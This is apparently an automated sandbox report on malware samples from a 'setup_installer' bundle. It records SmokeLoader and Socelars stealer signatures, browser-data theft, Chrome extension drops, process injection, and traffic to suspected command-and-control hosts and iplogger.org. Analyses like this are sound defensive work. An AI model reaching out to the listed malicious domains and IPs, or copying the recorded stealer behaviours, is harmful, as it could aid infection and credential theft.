memory/1048-7-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1048-8-0x000000006EB40000-0x000000006EB63000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win7-20240903-en

Max time kernel

121s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09f257bb7877d00b2.exe"

Signatures

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09f257bb7877d00b2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09f257bb7877d00b2.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

138s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\libcurl.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4448 wrote to memory of 4304 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4448 wrote to memory of 4304 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4448 wrote to memory of 4304 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\libcurl.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\libcurl.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4304 -ip 4304

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 652

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/4304-0-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4304-1-0x0000000064941000-0x000000006494F000-memory.dmp

memory/4304-2-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4304-5-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4304-4-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4304-3-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4304-9-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4304-7-0x000000006EB40000-0x000000006EB63000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win7-20240903-en

Max time kernel

118s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b2a8bc4f16cb.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b2a8bc4f16cb.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b2a8bc4f16cb.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b2a8bc4f16cb.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 136

Network

N/A

Files

memory/2236-1-0x0000000002CE0000-0x0000000002DE0000-memory.dmp

memory/2236-3-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2236-2-0x0000000000020000-0x0000000000029000-memory.dmp

memory/2236-5-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2236-4-0x0000000000400000-0x0000000002BAA000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win7-20240903-en

Max time kernel

118s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b3a5ca1a712d390.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b3a5ca1a712d390.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b3a5ca1a712d390.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b3a5ca1a712d390.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b3a5ca1a712d390.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp

Files

memory/1924-0-0x00000000742AE000-0x00000000742AF000-memory.dmp

memory/1924-1-0x0000000000200000-0x0000000000218000-memory.dmp

memory/1924-2-0x0000000000480000-0x0000000000486000-memory.dmp

memory/1924-3-0x00000000742A0000-0x000000007498E000-memory.dmp

memory/1924-4-0x00000000742AE000-0x00000000742AF000-memory.dmp

memory/1924-5-0x00000000742A0000-0x000000007498E000-memory.dmp

memory/1924-6-0x00000000742A0000-0x000000007498E000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d8d6edfaff2ac.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d8d6edfaff2ac.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d8d6edfaff2ac.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d8d6edfaff2ac.exe"

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 170.253.116.51.in-addr.arpa udp

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

141s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-PV135.tmp\Wed09d27135e5a8b3b.tmp N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-PV135.tmp\Wed09d27135e5a8b3b.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-BQE7O.tmp\Wed09d27135e5a8b3b.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4912 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-PV135.tmp\Wed09d27135e5a8b3b.tmp
PID 4912 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-PV135.tmp\Wed09d27135e5a8b3b.tmp
PID 4912 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-PV135.tmp\Wed09d27135e5a8b3b.tmp
PID 4620 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\is-PV135.tmp\Wed09d27135e5a8b3b.tmp C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe
PID 4620 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\is-PV135.tmp\Wed09d27135e5a8b3b.tmp C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe
PID 4620 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\is-PV135.tmp\Wed09d27135e5a8b3b.tmp C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe
PID 1192 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-BQE7O.tmp\Wed09d27135e5a8b3b.tmp
PID 1192 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-BQE7O.tmp\Wed09d27135e5a8b3b.tmp
PID 1192 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-BQE7O.tmp\Wed09d27135e5a8b3b.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe"

C:\Users\Admin\AppData\Local\Temp\is-PV135.tmp\Wed09d27135e5a8b3b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-PV135.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$A0242,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-BQE7O.tmp\Wed09d27135e5a8b3b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-BQE7O.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$B0242,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe" /SILENT

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 ppgggb.com udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/4912-2-0x0000000000401000-0x000000000040B000-memory.dmp

memory/4912-0-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PV135.tmp\Wed09d27135e5a8b3b.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/4620-7-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-4U5DU.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/4620-24-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1192-20-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4912-26-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1192-22-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2396-30-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-8JEMV.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1192-40-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2396-42-0x0000000000400000-0x00000000004BD000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe"

Signatures

Socelars

stealer socelars

Socelars family

socelars

Reads user/profile data of web browsers

spyware stealer

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up geolocation information via web service

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757909287574964" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4496 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe C:\Windows\SysWOW64\cmd.exe
PID 4496 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe C:\Windows\SysWOW64\cmd.exe
PID 4496 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe C:\Windows\SysWOW64\cmd.exe
PID 3436 wrote to memory of 4832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3436 wrote to memory of 4832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
